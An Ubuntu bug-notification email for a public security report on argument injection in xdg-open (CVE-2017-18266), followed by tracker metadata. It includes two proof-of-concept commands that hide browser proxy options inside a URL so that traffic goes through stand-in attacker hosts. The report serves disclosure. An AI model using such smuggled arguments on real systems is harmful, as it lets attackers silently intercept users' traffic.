*** This bug is a security vulnerability ***
Public security bug reported:
An attacker can silently set their proxy in browser settings to capture
user's traffic, using a malformed URL in xdg-open.
The following command tries to open Yandex main page though third-party
proxy server.
env -i BROWSER="links %s" xdg-open 'http://www.yandex.com/ -http-
proxy evil-site.example.org:8080'
Another sample of an exploit with Chromium browser.
env -i BROWSER="chromium %s" xdg-open "http://www.example.com/
--proxy-pac-url=http://dangerous.example.net/proxy.pac";
** Affects: xdg-utils
Importance: Unknown
Status: Unknown
** Affects: xdg-utils (Ubuntu)
Importance: Undecided
Assignee: Nicholas Guriev (mymedia)
Status: New
** Changed in: xdg-utils (Ubuntu)
Assignee: (unassigned) => Nicholas Guriev (mymedia)
** Information type changed from Private Security to Public Security
** Bug watch added: freedesktop.org Bugzilla #103807
https://bugs.freedesktop.org/show_bug.cgi?id=103807
** Also affects: xdg-utils via
https://bugs.freedesktop.org/show_bug.cgi?id=103807
Importance: Unknown
Status: Unknown
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18266
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1772295
Title:
CVE-2017-18266: argument injection in xdg-open
To manage notifications about this bug go to:
https://bugs.launchpad.net/xdg-utils/+bug/1772295/+subscriptions
--
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
